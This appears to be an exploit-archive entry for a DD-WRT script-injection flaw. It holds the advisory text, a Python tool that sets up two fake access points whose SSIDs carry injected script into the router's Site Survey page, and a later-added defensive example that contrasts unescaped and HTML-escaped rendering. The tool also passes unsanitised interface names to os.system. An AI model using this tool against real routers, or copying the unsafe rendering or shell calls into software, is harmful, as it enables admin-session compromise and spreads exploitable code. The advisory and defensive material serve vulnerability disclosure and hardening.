source: https://www.securityfocus.com/bid/30573/info
DD-WRT is prone to a script-injection vulnerability because it fails to adequately sanitize user-supplied data to the 'Site Survey' section of the administrative web interface.
Attackers can exploit this issue to execute arbitrary script code in the DD-WRT web interface.
Versions prior to DD-WRT 24-sp1 are vulnerable.
#!/usr/bin/env python
#
# This tool is distributed under a BSD licence. A copy of this
# should have been included with this file.
#
# Copyright (c) 2008, Rafael Dominguez Vega.
#
# This tool is designed for the purpose of performing security
# testing only and is not intended to be used for unlawful
# activities.
#
# This tool can be used to check for SSID script injection
# vulnerabilities in different software products.
#
# Help can be viewed by running this file with --help.
#
#
# Author: Rafael Dominguez Vega
# Version: 0.0.2
#
# Further information: rafael ({dot}) dominguez-vega <(at)>
# mwrinfosecurity {(dot)} com
#
import optparse
import sys
import os
import time


class OptionParser(optparse.OptionParser):
    # Abort with a usage message when a required option is missing.
    def check_required(self, opt):
        option = self.get_option(opt)
        if getattr(self.values, option.dest) is None:
            self.error("%s option not supplied" % option)


parser = OptionParser()
parser.add_option("-i", "--interface1", action="store", dest="ap1",
                  help="Network interface for first Access Point (required)")
parser.add_option("-j", "--interface2", action="store", dest="ap2",
                  help="Network interface for second Access Point (required)")
parser.add_option("-s", "--ssid1", action="store", dest="ssid1",
                  help="SSID for first Access Point. Between double quotes "
                       "(\"\") if special characters are used (required)")
parser.add_option("-t", "--ssid2", action="store", dest="ssid2",
                  help="SSID for second Access Point. Between double quotes "
                       "(\"\") if special characters are used (required)")
(options, args) = parser.parse_args()

parser.check_required("-i")
if options.ap1:
    ap1 = options.ap1
else:
    sys.exit(0)
parser.check_required("-j")
if options.ap2:
    ap2 = options.ap2
else:
    sys.exit(0)
parser.check_required("-s")
if options.ssid1:
    ssid1 = options.ssid1
else:
    sys.exit(0)
parser.check_required("-t")
if options.ssid2:
    ssid2 = options.ssid2
else:
    sys.exit(0)


def shell_escape(s):
    # Backslash-escape the characters the shell would otherwise interpret,
    # so the SSID reaches iwconfig exactly as supplied on the command line.
    for c in "<>()$&;|* ":
        s = s.replace(c, "\\" + c)
    return s


ssid1 = shell_escape(ssid1)
ssid2 = shell_escape(ssid2)

# Tear down any existing virtual APs on the two interfaces (madwifi wlanconfig).
os.system("wlanconfig " + ap1 + " destroy")
os.system("wlanconfig " + ap2 + " destroy")
print("\n Initialising fake APs...\n")
# Bring up two access points on wifi0, one per SSID.
os.system("wlanconfig " + ap1 + " create wlandev wifi0 wlanmode ap bssid")
time.sleep(3)
os.system("iwconfig " + ap1 + " essid " + ssid1)
time.sleep(2)
os.system("wlanconfig " + ap2 + " create wlandev wifi0 wlanmode ap bssid")
time.sleep(3)
os.system("iwconfig " + ap2 + " essid " + ssid2)
print("Payload: " + ssid1 + ssid2)
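A defender-side illustration of the flaw the advisory describes, added here and not part of the original advisory, the tool above, or the DD-WRT code: a site-survey table rendered once with scanned SSIDs interpolated raw and once HTML-escaped, run over a constructed scan result. The scan tuple layout, the function names and the `unescaped_ssid_markup` regression check are assumptions made for this example.

```python
import html

# Constructed sample of what a wireless scan might return: raw SSID bytes
# (an SSID is an arbitrary 0-32 byte string, not necessarily text) plus a
# signal level. The third entry carries HTML markup inside the SSID.
SAMPLE_SCAN = [
    (b"HomeNet", -41),
    (b"Caf\xc3\xa9 Guest", -67),
    (b"<script>alert(1)</script>", -55),
    (b"\xff\xfeBadBytes", -80),
]


def ssid_to_text(raw):
    # Decode defensively: an SSID need not be valid UTF-8, and decoding
    # must never raise on attacker-chosen bytes. Enforce the 802.11 length
    # limit so oversized values are rejected rather than truncated later.
    if len(raw) > 32:
        raise ValueError("SSID longer than 32 bytes")
    return raw.decode("utf-8", errors="replace")


def render_row_unsafe(ssid, level):
    # The pattern the advisory describes: scan data dropped into the admin
    # page as-is, so markup inside an SSID becomes part of the page DOM.
    return "<tr><td>%s</td><td>%d</td></tr>" % (ssid, level)


def render_row_safe(ssid, level):
    # Hardened form: HTML-escape every untrusted field before embedding it
    # in markup (quote=True also covers attribute contexts).
    return "<tr><td>%s</td><td>%d</td></tr>" % (html.escape(ssid, quote=True), level)


def render_site_survey(scan, safe=True):
    row = render_row_safe if safe else render_row_unsafe
    rows = [row(ssid_to_text(raw), level) for raw, level in scan]
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def unescaped_ssid_markup(rendered, scan):
    # Regression check for the template above: every '<' in a correctly
    # escaped page comes from the template itself (2 for <table>/</table>
    # plus 6 per row). Any surplus '<' leaked from an SSID.
    expected = 2 + 6 * len(scan)
    return rendered.count("<") - expected
```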